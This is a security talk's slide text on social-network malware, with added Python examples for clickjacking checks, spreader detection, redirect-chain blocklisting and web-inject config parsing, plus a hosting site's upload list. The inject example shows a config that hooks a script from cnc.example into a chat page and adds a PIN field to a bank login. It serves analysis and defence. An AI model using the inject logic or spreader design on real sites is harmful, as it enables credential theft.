$WHOAMI
Aditya K Sood
• Senior Consultant at IOActive: http://ioactive.com/
• Others
  • Worked previously for Armorize, Coseinc and KPMG
  • Active speaker at security conferences
  • Written content – IEEE Magazine / Virus Bulletin / ISSA / ISACA / CrossTalk / HITB / Hakin9 / Elsevier NESE|CFS
• Personal website:
  • LinkedIn: http://www.linkedin.com/in/adityaks
  • Website: http://www.secniche.org
  • Blog: http://secniche.blogspot.com
Coordinated Research
• Rohit Bansal, Cyber Security Division, PMO India
• Dr. Richard J. Enbody, Associate Professor, Michigan State University
About IOActive
Established in 1998, IOActive is an industry leader that offers comprehensive computer security
services with specializations in smart grid technologies, software assurance, and compliance. Boasting a
well-rounded and diverse clientele, IOActive works with a majority of Global 500 companies including
power and utility, game, hardware, retail, financial, media, travel, aerospace, healthcare, high-tech,
social networking, and software development organizations.
WHOAMI !
• The points presented in this talk are based entirely on independent research and do not relate to any of my previous or present employers.
• A number of images have been taken from different resources (Sophos, etc.); others were collected during real-time analysis:
  • Phishing emails, spam messages, rogue tweets, etc.
  • Reverse-engineering snippets of malware
• The demos (videos) are built using malware samples and real-time analysis of different attacks
Disclaimer
• A malicious link is served on OSNs
• Users follow that link and get infected with malware
Question – who is responsible?
• OSN vendors, for serving that link
• Users, for following that link
• Browsers, for getting exploited
• Third-party plugins (Java, Adobe, etc.), for inherent vulnerabilities
• Anti-virus vendors, for not detecting the malware
• IPS/IDS, for failing to detect the data exfiltration
Social Networks – Malware Paradigm !
The Reality !
Conduct operations in a deceptive manner
Steal identities and sensitive information
Breach privacy
Harness the power of inherent design of OSNs
Exploit the built-in design model to trigger attacks
Automated in nature
OSN Malware : Features
Phishing/Spams
OSN Scams
LikeJacking/ClickJacking
Rogue Applications and Profiles (Facebook, Twitter etc.)
Sponsored Advertisements and Malvertisements
Worms
Socioware
Emerging Trends : History to Now…
• OSNs user base
• Facebook
  • 1.05 billion
  • Refer: Facebook quarterly earnings, Q4 2012
  • http://www.scribd.com/doc/123034877/Facebook-Q4-2012-Investor-Slide-Deck
Users are the Assets !
OSNs User Base
• Twitter – 465 million, and reached 500 million recently
  • Refer: http://blog.sironaconsulting.com
Users are the Assets !
• Barracuda study (2012)
  • http://www.barracudalabs.com/fbinfographic/
Analytics !
Chain Exploitation—Social Networks Malware
 - http://www.isaca.org/Journal/Past-Issues/2011/Volume-1/Pages/Chain-
Exploitation-Social-Networks-Malware.aspx
OSN Chain Infection !
Online Social Network Malware - Trends
Phishing
• Old-school tactic, but amazingly it still works
• Brand-name manipulation and social engineering
• Exploits ignorance and doubt among OSN users
• Extensively used for conducting drive-by-download attacks
Trend (1) – Phishing (Facebook)
Trend (1) – Phishing (Twitter)
• Used in survey scams
• URL shortener services are very useful to spammers:
  • Hiding the real target
  • Serving exploits
  • Redirecting on the fly
Trend (1) – Spamming (Twitter)
• Illegitimate surveys and polls
• Spreading malware
• Stealing user information
Trend (2) – Scams
Note: a number of fake Facebook profiles have existed for more than a year.
Trend (3) – Fake Profiles
Trend (4) – Malicious Applications
Trend (5) – Malvertisement
Koobface (2009-2010)
• Injected malicious content into wall posts; hoax warnings
• Sent emails to the inboxes of registered Facebook users
• Chain infection to distribute the Koobface malware to a large set of users
• Also used stolen Facebook credentials for malicious purposes
Likejacking worm (2010-2012)
• Injects malicious links
• Raises ratings by triggering unauthorized likes
Trend (6) – Worms
LilyJade (2012)
• Exploits the Crossrider web API to build a plugin that attacks different browsers
• Uses jQuery to send malicious messages
Ramnit worm (2010-2012)
• Stolen Facebook account credentials are used to deliver malicious messages through the compromised accounts
Trend (6) – Worms (cont…)
• Injecting malicious links alongside likes
• Manipulating the implementation of the Like functionality
• Very effective in tricking users into following the likes
• Earlier used to spread malware, but now:
  • It has become a legitimate business model. Amazing!
  • For $5, one can buy a number of likes!
Trend (7) – Likejacking/ Clickjacking
• This demo shows how likejacking was conducted earlier to trigger infections on Facebook
• It worked when Facebook did not implement any confirmation button
• The newly deployed code restricts the active implementation of this attack, but it is not a complete solution
• A new variant of likejacking code can be expected in the near future
LikeJacking/Clickjacking Demo (Facebook)
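Likejacking only works if the page carrying the Like button can be loaded inside a frame on an attacker-controlled site. Whether a response permits that is decided by its X-Frame-Options and Content-Security-Policy frame-ancestors headers, which is the check a tester wants to run before worrying about confirmation dialogs. The following is an added example, not code from this talk or from Facebook; the header sets and the origins site.example, attacker.example and partner.example are constructed for illustration.

```python
"""Decide whether an HTTP response lets its page be framed by another origin,
the precondition for clickjacking and likejacking.

Added example, not code from the talk or from Facebook. The header sets and
origins below are constructed for illustration.
"""
from urllib.parse import urlparse


def _frame_ancestors(csp: str):
    """Return the source list of the frame-ancestors directive (lower-cased,
    quotes kept), or None if the directive is absent. An empty source list
    matches nothing, which CSP treats like 'none'."""
    for directive in csp.split(";"):
        parts = directive.strip().split()
        if parts and parts[0].lower() == "frame-ancestors":
            return [p.lower() for p in parts[1:]] or ["'none'"]
    return None


def _ancestor_allows(sources, framer, page):
    """Apply a frame-ancestors source list to the framing origin."""
    if sources == ["'none'"]:
        return False
    framer_host = urlparse(framer).hostname or ""
    for src in sources:
        if src == "*":
            return True
        if src == "'self'":
            if framer == page:
                return True
        elif src in ("http:", "https:"):          # scheme-source
            if framer.startswith(src):
                return True
        elif src.startswith("*."):                # wildcard host-source
            if framer_host.endswith(src[1:]):
                return True
        elif framer == src.rstrip("/") or framer_host == src:
            return True
    return False


def frameable_by(headers, framer_origin, page_origin):
    """True if a page served with `headers` at `page_origin` may be embedded
    in a frame by a document at `framer_origin`. Header names are
    case-insensitive. Rules (simplified from the specs):
      - A CSP frame-ancestors directive decides, and X-Frame-Options is
        then ignored (browsers give CSP precedence).
      - Else X-Frame-Options: DENY -> never; SAMEORIGIN -> same origin only;
        ALLOW-FROM <origin> -> that origin only (legacy); any other value ->
        header ignored, so the page is frameable.
      - No header at all -> frameable by anyone.
    """
    lower = {k.lower(): v for k, v in headers.items()}
    framer = framer_origin.lower().rstrip("/")
    page = page_origin.lower().rstrip("/")

    csp = lower.get("content-security-policy")
    if csp is not None:
        sources = _frame_ancestors(csp)
        if sources is not None:
            return _ancestor_allows(sources, framer, page)

    xfo = lower.get("x-frame-options", "").strip()
    if not xfo:
        return True
    token, _, rest = xfo.partition(" ")
    token = token.upper()
    if token == "DENY":
        return False
    if token == "SAMEORIGIN":
        return framer == page
    if token == "ALLOW-FROM":
        return framer == rest.strip().lower().rstrip("/")
    return True


# Constructed response header sets to audit.
SAMPLE_RESPONSES = {
    "no_headers":  {"Content-Type": "text/html"},
    "xfo_deny":    {"X-Frame-Options": "DENY"},
    "xfo_same":    {"x-frame-options": "sameorigin"},
    "xfo_garbage": {"X-Frame-Options": "ALLOWALL"},
    "csp_wins":    {"X-Frame-Options": "DENY",
                    "Content-Security-Policy": "default-src 'self'; frame-ancestors 'self'"},
    "csp_partner": {"Content-Security-Policy": "frame-ancestors https://partner.example"},
}


def audit(page_origin="https://site.example", attacker="https://attacker.example"):
    """Map each sample to whether `attacker` can frame the page; the entries
    reported True are the likejacking candidates."""
    return {name: frameable_by(h, attacker, page_origin)
            for name, h in SAMPLE_RESPONSES.items()}


if __name__ == "__main__":
    for name, frameable in audit().items():
        print(f"{name:12s} frameable by attacker: {frameable}")
```

The `csp_wins` sample is the case to remember: a site that sets `X-Frame-Options: DENY` but also ships a `frame-ancestors 'self'` policy is still frameable by itself, because browsers honour CSP and drop the older header. A confirmation dialog, as the slide notes, only raises the cost of the attack; refusing to be framed by third parties removes it.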
• Stealing OSN-specific user credentials
• Hooks the browser to capture all POST requests used for submitting forms
  • HTTP POST requests carry the account credentials
• OSN-specific account credentials were used earlier for building worms
  • Example: Koobface
• Details on the form-grabbing technique:
  • http://www.virusbtn.com/virusbulletin/archive/2011/11/vb201111-form-grabbing
Trend (8) – Identity Stealing (Grabbers)
• A bot with built-in functionality to capture OSN data is installed in the testing environment
• The Facebook website is opened and credentials are provided
• The bot steals the user credentials
OSN Grabber (Demo)
• Malware targeting OSNs from end-user machines
• Malware exploiting OSN functionality in an automated manner
• Virtually turns your friends into frenemies
• Exploits users by compromising
  • Identity
  • Privacy
• Completely deceptive in nature
[Diagram: Socioware at the intersection of Online Social Networks and Malware]
Trend (9) - Socioware
Socioware
• A class of malware explicitly used to spread infections across different OSNs (Facebook, Twitter, etc.)
• Primarily developed as built-in components of bots
• Named SPREADERS in the underground economy
• Explicitly used for building OSN worms
• Subverts capabilities of OSNs to distribute malware to large sections of users
How?
• Based on the Man-in-the-Browser (MitB) paradigm
• Triggers infections from already-infected machines
• Browsers are hooked and OSN web pages are injected
• Exploits the trust model that exists between users
Trend (9) – Inside Socioware
Understanding Socioware – Targeting Facebook Online Chat
Facebook Chat – Infections !
• Creating a malicious Facebook application and embedding a Java applet that triggers a drive-by download to install the spreader
• Using an existing botnet to push spreaders onto already-infected machines
• Pay-per-infection (PPI) combined with browser exploit packs (BEPs) on infected websites to distribute spreaders
• Using USB devices to distribute spreaders physically
Spreaders – Distribution !
• Executable (injection engine): the primary logic file that spreads the malicious messages
• Status notification component: reports the status of each injection (success/failure)
• Link storage component: stores the different injections (URLs) to be injected by the executable
• Time interval component: logic that decides when to inject the malicious link, based on timing
Spreaders – Components !
• Step 1 – Installed on the end user's machine
• Step 2 – Hooks browser libraries and controls the HTTP communication channel
• Step 3 – Remains dormant and starts a monitoring engine to detect OSN browsing through the browser
• Step 4 – On successful detection, triggers internal logic to find the pattern in the web page
• Step 5 – Reads the malicious message from a file (or internally) for injection
• Step 6 – Triggers the injection and notifies the C&C of the state (success or failure)
• Step 7 – Deactivates itself for a few minutes and then starts infecting again
Spreaders – Internal Design
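The seven steps above also describe what a spreader looks like from the OSN's side: one account pushing the same URL-bearing message to many friends at a machine-regular interval (the time interval component), then going quiet. The following added example, not code from the talk and not the spreader's own code, runs that heuristic over a constructed chat log; the log format, the account names and the short.example link are invented for the demonstration, and the thresholds are assumptions to tune.

```python
"""Flag spreader-style chat injection in a constructed message log.

Added example, not code from the talk. The heuristic follows the spreader
design on the slide: one fixed link, many recipients, fixed timing. The log
lines, account names and link below are constructed.
"""
import re
import statistics
from collections import defaultdict
from datetime import datetime

URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)

# Constructed log, one event per line: "timestamp|sender|recipient|message"
SAMPLE_LOG = """\
2013-05-08T10:00:00|alice|bob|hey did you see this http://short.example/x1y2z3 lol
2013-05-08T10:00:30|alice|carol|hey did you see this http://short.example/x1y2z3 lol
2013-05-08T10:01:00|alice|dave|hey did you see this http://short.example/x1y2z3 lol
2013-05-08T10:01:30|alice|erin|hey did you see this http://short.example/x1y2z3 lol
2013-05-08T10:02:00|bob|alice|what? that link looks weird
2013-05-08T10:05:00|carol|dave|lunch at noon? https://cafe.example/menu
2013-05-08T11:00:00|carol|erin|ok see you at https://cafe.example/menu
"""


def parse_log(text):
    """Parse the pipe-separated log into (timestamp, sender, recipient, msg)."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, sender, recipient, msg = line.split("|", 3)
        events.append((datetime.fromisoformat(ts), sender, recipient, msg))
    return events


def normalize(msg):
    """Collapse whitespace and case so trivially varied copies group together."""
    return " ".join(msg.lower().split())


def find_spreaders(events, min_recipients=3, window_seconds=600, max_jitter=5.0):
    """Return {sender: details} for senders that pushed the same URL-bearing
    message to at least `min_recipients` distinct recipients within
    `window_seconds`. A low standard deviation of the gaps between sends
    (<= max_jitter seconds) marks machine-regular timing, which humans
    rarely produce."""
    by_key = defaultdict(list)  # (sender, normalized message) -> [(ts, recipient)]
    for ts, sender, recipient, msg in events:
        if URL_RE.search(msg):
            by_key[(sender, normalize(msg))].append((ts, recipient))

    flagged = {}
    for (sender, msg), hits in by_key.items():
        hits.sort()
        recipients = {r for _, r in hits}
        span = (hits[-1][0] - hits[0][0]).total_seconds()
        if len(recipients) < min_recipients or span > window_seconds:
            continue
        gaps = [(b[0] - a[0]).total_seconds() for a, b in zip(hits, hits[1:])]
        stddev = statistics.pstdev(gaps) if len(gaps) > 1 else 0.0
        flagged[sender] = {
            "url": URL_RE.search(msg).group(0),
            "recipients": len(recipients),
            "interval_stddev": stddev,
            "regular_timing": stddev <= max_jitter,
        }
    return flagged


if __name__ == "__main__":
    for sender, info in find_spreaders(parse_log(SAMPLE_LOG)).items():
        print(sender, info)
```

Carol sends two different messages with the same legitimate link and is not flagged; Alice sends an identical link message to four friends thirty seconds apart and is. In production the thresholds would be tuned against the rate at which real users forward links, and the flagged URL would be handed to the URL analysis in the protection section later in the deck.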
• The spreader is installed in a controlled virtual environment
• The Facebook website is opened and credentials are provided
• Facebook chat is activated to send messages to friends
• The spreader injects malicious messages after a given time interval
Spreaders Demo
• An automated way to inject unauthorized content into HTTP responses
• The technique works by:
  • Hijacking the communication channel of the browser
  • Manipulating the low-level HTTP protocol libraries used by the browser
• Primarily aimed at:
  • Stealing information from banking websites on end-user machines
Socioware - Universal Web Injects
• set_url [target web page URL] * GP
  • Sets the target web page to inject; * is a wildcard
  • Applies to all HTTP requests: G = GET and P = POST
• data_before / data_end tags
  • The content that must appear in the web page before the injected content
• data_inject / data_end tags
  • The data to inject into the web page
• data_after / data_end tags
  • The content that must appear in the web page after the injected content
Socioware - Universal Web Injects
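A parser for the set_url / data_before / data_inject / data_after format described above, written as an added example rather than code from the talk or from any crimeware kit. Given a captured config it lists which URLs and methods are targeted and applies each rule to a page the way a Man-in-the-Browser engine would, which is how an analyst turns a config dump into a target list and a reproduction of what the victim would have seen. The config, page and hostnames (social.example, bank.example, cnc.example) are constructed; treating the text between the before and after anchors as replaced by the injected data, and ignoring flag letters other than G and P, are assumptions.

```python
"""Parse and apply web-inject rules in the set_url / data_* format.

Added example, not code from the talk or from any malware family. The
config, page and hostnames below are constructed. Assumptions: the text
between the data_before and data_after anchors is replaced by data_inject
(pure insertion when data_after is empty), and flags other than G/P are
ignored.
"""
import re
from dataclasses import dataclass


@dataclass
class InjectRule:
    url_pattern: str      # set_url value, '*' is a wildcard
    methods: set          # subset of {"GET", "POST"} from the G/P flags
    before: str = ""      # data_before block
    inject: str = ""      # data_inject block
    after: str = ""       # data_after block


def parse_webinjects(text):
    """Turn a config file into a list of InjectRule, raising on malformed input."""
    rules, current, section, buf = [], None, None, []
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("set_url"):
            parts = line.split()
            if len(parts) < 2:
                raise ValueError("set_url without a URL")
            flags = parts[2].upper() if len(parts) > 2 else "GP"
            methods = {m for f, m in (("G", "GET"), ("P", "POST")) if f in flags}
            current = InjectRule(parts[1], methods)
            rules.append(current)
        elif line in ("data_before", "data_inject", "data_after"):
            if current is None:
                raise ValueError(f"{line} before any set_url")
            section, buf = line[len("data_"):], []
        elif line == "data_end":
            if section is None:
                raise ValueError("data_end without an open data_* block")
            setattr(current, section, "\n".join(buf))
            section = None
        elif section is not None:
            buf.append(raw)   # keep indentation inside a block verbatim
        # blank lines and anything else outside a block are ignored
    return rules


def _pattern_to_regex(pattern):
    """'*' matches any run of characters; everything else is literal."""
    return re.compile("^" + ".*".join(re.escape(p) for p in pattern.split("*")) + "$",
                      re.IGNORECASE)


def matching_rules(rules, url, method):
    """Rules whose URL pattern and method flags apply to this request."""
    return [r for r in rules
            if method.upper() in r.methods and _pattern_to_regex(r.url_pattern).match(url)]


def apply_injects(html, rules, url, method="GET"):
    """Return (modified_html, number_of_rules_applied). For each matching
    rule, the first occurrence of `before` is located and the text up to the
    following `after` is replaced by `inject`; a rule whose anchors are not
    found in the page is skipped, as a MitB engine would skip it."""
    applied = 0
    for rule in matching_rules(rules, url, method):
        start = html.find(rule.before) if rule.before else 0
        if start < 0:
            continue
        start += len(rule.before)
        end = html.find(rule.after, start) if rule.after else start
        if end < 0:
            continue
        html = html[:start] + rule.inject + html[end:]
        applied += 1
    return html, applied


# Constructed config: one social-network rule and one banking rule.
SAMPLE_CONFIG = """\
set_url https://www.social.example/* GP
data_before
<div id="chat_box">
data_end
data_inject
<script src="https://cnc.example/hook.js"></script>
data_end
data_after
</div>
data_end

set_url https://bank.example/login* P
data_before
<form id="login">
data_end
data_inject
<input type="hidden" name="atm_pin" placeholder="ATM PIN">
data_end
data_after
data_end
"""

# Constructed page as the browser would receive it.
SAMPLE_PAGE = '<html><body><div id="chat_box">hello</div><p>end</p></body></html>'

if __name__ == "__main__":
    rules = parse_webinjects(SAMPLE_CONFIG)
    for r in rules:
        print(r.url_pattern, sorted(r.methods))
    print(apply_injects(SAMPLE_PAGE, rules, "https://www.social.example/home"))
```

The two rules show the two uses the slide mentions: the first hooks a script into the OSN chat container (a spreader delivery), the second is the classic banking inject that adds a field the real login form never had. Listing `url_pattern` and `methods` across a captured config is the quickest way to see which brands a bot build is targeting.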
Immune System
• User feedback on the channel that the malware uses as a launchpad
• Based on a message classifier: a user is identified as infected with malware when the classifier marks their messages as shady, in combination with feedback provided by the user's friends
• User marking is used in conjunction with URL characteristics and features
• Refer: http://research.microsoft.com/en-us/projects/ldg/a10-stein.pdf
Traffic Analyzer
• Crawls every possible URL
• Resolves DNS entries and checks them against blacklists
• Requires resolving URL shorteners too
Facebook Built-in Protection
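The traffic analyzer above has to follow a link through every redirect, including the URL shorteners that the spamming slide earlier describes as hiding the real target, before the final host can be checked against a blocklist. The following added example, not code from the talk or from Facebook, does that with a constructed table of HTTP responses standing in for the network so it runs offline; the shortener list, the blocklist and every hostname are constructed.

```python
"""Resolve a link's redirect chain (shorteners included) and check every hop
against a blocklist, as the slide's traffic analyzer does.

Added example, not code from the talk or from Facebook. Network access is
replaced by a constructed response table so it runs offline; shortener list,
blocklist and hostnames are constructed.
"""
from urllib.parse import urljoin, urlparse

SHORTENERS = {"short.example", "t.example"}                 # constructed
BLOCKLIST = {"malware-dropper.example", "evil.example"}     # constructed
REDIRECT_CODES = {301, 302, 303, 307, 308}

# Constructed "network": url -> (status, Location header or None)
FAKE_RESPONSES = {
    "http://short.example/abc": (301, "http://t.example/def"),
    "http://t.example/def": (302, "/landing"),                 # relative Location
    "http://t.example/landing": (302, "https://cdn.malware-dropper.example/update.exe"),
    "https://cdn.malware-dropper.example/update.exe": (200, None),
    "http://short.example/loop1": (301, "http://short.example/loop2"),
    "http://short.example/loop2": (301, "http://short.example/loop1"),
    "https://news.example/story": (200, None),
}


def fake_fetch(url):
    """Stand-in for an HTTP HEAD/GET that does not follow redirects."""
    return FAKE_RESPONSES.get(url, (404, None))


def _listed(host, domains):
    """True if host is one of `domains` or a subdomain of one."""
    host = host.lower()
    return any(host == d or host.endswith("." + d) for d in domains)


def resolve_chain(url, fetch=fake_fetch, max_hops=10):
    """Follow redirects from `url`. Returns (chain, outcome) where outcome is
    'final', 'loop' or 'too_many_hops'. Relative Location headers are
    resolved against the current URL; a revisited URL ends the walk."""
    chain, seen = [url], {url}
    while len(chain) <= max_hops:
        status, location = fetch(chain[-1])
        if status not in REDIRECT_CODES or not location:
            return chain, "final"
        nxt = urljoin(chain[-1], location)
        chain.append(nxt)
        if nxt in seen:
            return chain, "loop"
        seen.add(nxt)
    return chain, "too_many_hops"


def analyze_link(url, fetch=fake_fetch):
    """Classify a link from its whole chain, not just the URL the user sees."""
    chain, outcome = resolve_chain(url, fetch)
    hosts = [urlparse(u).hostname or "" for u in chain]
    hits = [u for u, h in zip(chain, hosts) if _listed(h, BLOCKLIST)]
    if hits:
        verdict = "block"
    elif outcome != "final":
        verdict = "suspicious"       # loops and endless chains are not benign
    else:
        verdict = "allow"
    return {
        "chain": chain,
        "outcome": outcome,
        "uses_shortener": any(_listed(h, SHORTENERS) for h in hosts),
        "blocklist_hits": hits,
        "verdict": verdict,
    }


if __name__ == "__main__":
    for u in ("http://short.example/abc", "http://short.example/loop1",
              "https://news.example/story"):
        print(u, "->", analyze_link(u)["verdict"])
```

Checking only the URL as posted would pass short.example/abc, since the shortener host itself is not listed; the chain reveals the dropper three hops later. Resolving relative `Location` headers and cutting redirect loops are the two details that most home-grown resolvers get wrong.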
Why are end users and client-side software still the priority targets?
Point to Ponder !
• OSNs will remain the centralized target for distributing malware
• The trend of automated infections against OSNs will continue
• Significant increase in socioware-based crimeware services
• Possibility of advanced likejacking attacks
• Socioware attacking mobile platforms
Future !
Questions !
• To all my team members
• IOActive for its continuous support
• The Secure 360 team for giving me an opportunity to speak
Thanks !

BruCon (Brussels 2011) Hacking Conference - Botnets and Browsers (Brothers in...BruCon (Brussels 2011) Hacking Conference - Botnets and Browsers (Brothers in...
BruCon (Brussels 2011) Hacking Conference - Botnets and Browsers (Brothers in...
 
PenTest Magazine Teaser - Mobile Hacking
PenTest Magazine Teaser - Mobile HackingPenTest Magazine Teaser - Mobile Hacking
PenTest Magazine Teaser - Mobile Hacking
 

Recently uploaded

FIDO Alliance Osaka Seminar: Passkeys at Amazon.pdf
FIDO Alliance Osaka Seminar: Passkeys at Amazon.pdfFIDO Alliance Osaka Seminar: Passkeys at Amazon.pdf
FIDO Alliance Osaka Seminar: Passkeys at Amazon.pdf
FIDO Alliance
 
GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...
GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...
GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...
Neo4j
 
State of ICS and IoT Cyber Threat Landscape Report 2024 preview
State of ICS and IoT Cyber Threat Landscape Report 2024 previewState of ICS and IoT Cyber Threat Landscape Report 2024 preview
State of ICS and IoT Cyber Threat Landscape Report 2024 preview
Prayukth K V
 
FIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdfFIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance
 
DevOps and Testing slides at DASA Connect
DevOps and Testing slides at DASA ConnectDevOps and Testing slides at DASA Connect
DevOps and Testing slides at DASA Connect
Kari Kakkonen
 
The Future of Platform Engineering
The Future of Platform EngineeringThe Future of Platform Engineering
The Future of Platform Engineering
Jemma Hussein Allen
 
Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...
Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...
Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...
James Anderson
 
Video Streaming: Then, Now, and in the Future
Video Streaming: Then, Now, and in the FutureVideo Streaming: Then, Now, and in the Future
Video Streaming: Then, Now, and in the Future
Alpen-Adria-Universität
 
Securing your Kubernetes cluster_ a step-by-step guide to success !
Securing your Kubernetes cluster_ a step-by-step guide to success !Securing your Kubernetes cluster_ a step-by-step guide to success !
Securing your Kubernetes cluster_ a step-by-step guide to success !
KatiaHIMEUR1
 
Pushing the limits of ePRTC: 100ns holdover for 100 days
Pushing the limits of ePRTC: 100ns holdover for 100 daysPushing the limits of ePRTC: 100ns holdover for 100 days
Pushing the limits of ePRTC: 100ns holdover for 100 days
Adtran
 
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdfFIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance
 
GridMate - End to end testing is a critical piece to ensure quality and avoid...
GridMate - End to end testing is a critical piece to ensure quality and avoid...GridMate - End to end testing is a critical piece to ensure quality and avoid...
GridMate - End to end testing is a critical piece to ensure quality and avoid...
ThomasParaiso2
 
GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...
GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...
GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...
Neo4j
 
PCI PIN Basics Webinar from the Controlcase Team
PCI PIN Basics Webinar from the Controlcase TeamPCI PIN Basics Webinar from the Controlcase Team
PCI PIN Basics Webinar from the Controlcase Team
ControlCase
 
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...
SOFTTECHHUB
 
Introduction to CHERI technology - Cybersecurity
Introduction to CHERI technology - CybersecurityIntroduction to CHERI technology - Cybersecurity
Introduction to CHERI technology - Cybersecurity
mikeeftimakis1
 
Communications Mining Series - Zero to Hero - Session 1
Communications Mining Series - Zero to Hero - Session 1Communications Mining Series - Zero to Hero - Session 1
Communications Mining Series - Zero to Hero - Session 1
DianaGray10
 
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdfSmart TV Buyer Insights Survey 2024 by 91mobiles.pdf
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf
91mobiles
 
GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024
GraphSummit Singapore | The Art of the  Possible with Graph - Q2 2024GraphSummit Singapore | The Art of the  Possible with Graph - Q2 2024
GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024
Neo4j
 
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...
Neo4j
 

Recently uploaded (20)

FIDO Alliance Osaka Seminar: Passkeys at Amazon.pdf
FIDO Alliance Osaka Seminar: Passkeys at Amazon.pdfFIDO Alliance Osaka Seminar: Passkeys at Amazon.pdf
FIDO Alliance Osaka Seminar: Passkeys at Amazon.pdf
 
GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...
GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...
GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...
 
State of ICS and IoT Cyber Threat Landscape Report 2024 preview
State of ICS and IoT Cyber Threat Landscape Report 2024 previewState of ICS and IoT Cyber Threat Landscape Report 2024 preview
State of ICS and IoT Cyber Threat Landscape Report 2024 preview
 
FIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdfFIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdf
 
DevOps and Testing slides at DASA Connect
DevOps and Testing slides at DASA ConnectDevOps and Testing slides at DASA Connect
DevOps and Testing slides at DASA Connect
 
The Future of Platform Engineering
The Future of Platform EngineeringThe Future of Platform Engineering
The Future of Platform Engineering
 
Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...
Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...
Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...
 
Video Streaming: Then, Now, and in the Future
Video Streaming: Then, Now, and in the FutureVideo Streaming: Then, Now, and in the Future
Video Streaming: Then, Now, and in the Future
 
Securing your Kubernetes cluster_ a step-by-step guide to success !
Securing your Kubernetes cluster_ a step-by-step guide to success !Securing your Kubernetes cluster_ a step-by-step guide to success !
Securing your Kubernetes cluster_ a step-by-step guide to success !
 
Pushing the limits of ePRTC: 100ns holdover for 100 days
Pushing the limits of ePRTC: 100ns holdover for 100 daysPushing the limits of ePRTC: 100ns holdover for 100 days
Pushing the limits of ePRTC: 100ns holdover for 100 days
 
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdfFIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
 
GridMate - End to end testing is a critical piece to ensure quality and avoid...
GridMate - End to end testing is a critical piece to ensure quality and avoid...GridMate - End to end testing is a critical piece to ensure quality and avoid...
GridMate - End to end testing is a critical piece to ensure quality and avoid...
 
GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...
GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...
GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...
 
PCI PIN Basics Webinar from the Controlcase Team
PCI PIN Basics Webinar from the Controlcase TeamPCI PIN Basics Webinar from the Controlcase Team
PCI PIN Basics Webinar from the Controlcase Team
 
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...
 
Introduction to CHERI technology - Cybersecurity
Introduction to CHERI technology - CybersecurityIntroduction to CHERI technology - Cybersecurity
Introduction to CHERI technology - Cybersecurity
 
Communications Mining Series - Zero to Hero - Session 1
Communications Mining Series - Zero to Hero - Session 1Communications Mining Series - Zero to Hero - Session 1
Communications Mining Series - Zero to Hero - Session 1
 
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdfSmart TV Buyer Insights Survey 2024 by 91mobiles.pdf
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf
 
GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024
GraphSummit Singapore | The Art of the  Possible with Graph - Q2 2024GraphSummit Singapore | The Art of the  Possible with Graph - Q2 2024
